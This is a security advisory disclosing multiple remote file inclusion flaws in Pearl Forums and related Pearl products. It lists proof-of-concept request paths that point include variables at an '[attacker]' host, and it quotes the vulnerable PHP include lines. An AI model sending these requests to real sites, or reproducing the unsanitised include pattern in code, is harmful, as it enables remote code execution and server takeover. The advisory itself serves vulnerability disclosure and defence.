Pearl Products Multiple Remote File Inclusion Discovered By zero [Moroccan Security Team] Affected softwares: Pearl Forums 2.4 Ngoc Biec 1.4 Pearl For Biz 2.4 Pearl For Mambo 1.6 URL : http://sourceforge.net/projects/pearlforums/ Risk : High Impact: System access ------[ PoC ]----------------------------------------- /index.php?Document[languagePreference]=[attacker] /index.php?includesDirectory=[attacker] /index.php?templatesDirectory=[attacker] /includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminBanned.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminBoards.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminDocumentation.php?Document[languagePreference]=[attacker] /includes/adminEmails.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminErrorlogs.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminForums.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminGroups.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminMembers.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminPolls.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminReserved.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminSensored.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminSettings.php?GlobalSettings[templatesDirectory]=[attacker] /includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[attacker] /includes/help.php?Document[languagePreference]=[attacker] /includes/initialize.php?GlobalSettings[templatesDirectory]=[attacker] /includes/locale.php?GlobalSettings[templatesDirectory]=[attacker] /includes/login.php?GlobalSettings[templatesDirectory]=[attacker] /includes/members.php?GlobalSettings[templatesDirectory]=[attacker] /includes/merge.php?GlobalSettings[templatesDirectory]=[attacker] /includes/move.php?GlobalSettings[templatesDirectory]=[attacker] /includes/notify.php?GlobalSettings[templatesDirectory]=[attacker] /includes/password.php?GlobalSettings[templatesDirectory]=[attacker] /includes/password.php?Document[languagePreference]=[attacker] /includes/poll.php?GlobalSettings[templatesDirectory]=[attacker] /includes/post.php?GlobalSettings[templatesDirectory]=[attacker] /includes/profile.php?GlobalSettings[templatesDirectory]=[attacker] /includes/register.php?GlobalSettings[templatesDirectory]=[attacker] /includes/search.php?GlobalSettings[templatesDirectory]=[attacker] /includes/split.php?GlobalSettings[templatesDirectory]=[attacker] /includes/terms.php?Document[languagePreference]=[attacker] /includes/topics.php?GlobalSettings[templatesDirectory]=[attacker] So if register_globals=on remote attacker could inject arbitrary variable by Document[languagePreference] , GlobalSettings[templatesDirectory] or GlobalSettings[includesDirectory] ---[ Vuln Code ]-------------------------------------- [code index.php] 24. include("$Document[languagePreference]/lang.php"); 28. include("$includesDirectory/initialize.php"); 35. include("$templatesDirectory/master.php"); [/code] [code /includes/adminAttachments.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminAttachments.php"); [/code] [code /includes/adminAvatars.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminAvatars.php"); [/code] [code /includes/adminBackupdatabase.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminBackupdatabase.php"); [/code] [code /includes/adminBanned.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminBanned.php"); [/code] [code /includes/adminBoards.php] 21. include_once("$GlobalSettings[templatesDirectory]/adminBoards.php"); [/code] [code /includes/adminDocumentation.php] 18. include_once("$Document[languagePreference]/documentation.php"); [/code] [code /includes/adminEmails.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminEmails.php"); [/code] [code /includes/adminErrorlogs.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminErrorlogs.php"); [/code] [code /includes/adminForums.php] 21. include_once("$GlobalSettings[templatesDirectory]/adminForums.php"); [/code] [code /includes/adminGroups.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminGroups.php"); [/code] [code /includes/adminMembers.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminMembers.php"); [/code] [code /includes/adminPolls.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminPolls.php"); [/code] [code /includes/adminReserved.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminReserved.php"); [/code] [code /includes/adminSensored.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminSensored.php"); [/code] [code /includes/adminSettings.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminSettings.php"); [/code] [code /includes/adminSmileys.php] 19. include_once("$GlobalSettings[templatesDirectory]/adminSmileys.php"); [/code] [code /includes/help.php] 18. include_once("$Document[languagePreference]/help.php"); [/code] [code /includes/initialize.php] 47. include_once("$GlobalSettings[templatesDirectory]/master.php"); [/code] [code /includes/locale.php] 18. include_once("$GlobalSettings[templatesDirectory]/locale.php"); [/code] [code /includes/login.php] 39. include_once("$GlobalSettings[templatesDirectory]/login.php"); [/code] [code /includes/members.php] 19. include_once("$GlobalSettings[templatesDirectory]/members.php"); [/code] [code /includes/merge.php] 18. include_once("$GlobalSettings[templatesDirectory]/merge.php"); [/code] [code /includes/move.php] 18. include_once("$GlobalSettings[templatesDirectory]/move.php"); [/code] [code /includes/notify.php] 18. include_once("$GlobalSettings[templatesDirectory]/notify.php"); [/code] [code /includes/password.php] 19. include_once("$GlobalSettings[templatesDirectory]/password.php"); 20. include_once("$Document[languagePreference]/passwordMessages.php"); [/code] [code /includes/poll.php] 18. include_once("$GlobalSettings[templatesDirectory]/poll.php"); [/code] [code /includes/post.php] 18. include_once("$GlobalSettings[templatesDirectory]/post.php"); [/code] [code /includes/profile.php] 18. include_once("$GlobalSettings[templatesDirectory]/profile.php"); [/code] [code /includes/register.php] 18. include_once("$GlobalSettings[templatesDirectory]/register.php"); [/code] [code /includes/search.php] 19. include_once("$GlobalSettings[templatesDirectory]/search.php"); [/code] [code /includes/split.php] 18. include_once("$GlobalSettings[templatesDirectory]/split.php"); [/code] [code /includes/terms.php] 18. include_once("$Document[languagePreference]/termsContents.php"); [/code] [code /includes/topics.php] 18. include_once("$GlobalSettings[templatesDirectory]/topics.php"); [/code] - Solution ------------------------------------------------------ declare variables - Greetz ------------------------------------------------------ simo64, tahati, net_ghost, dabdoub, simo dreaminfo, iss4m, zerosecure, hunter, themenotor ... - Contact ------------------------------------------------------ Author: Mourad [ zero ] Email : xzerox(at)linuxmail(dot)org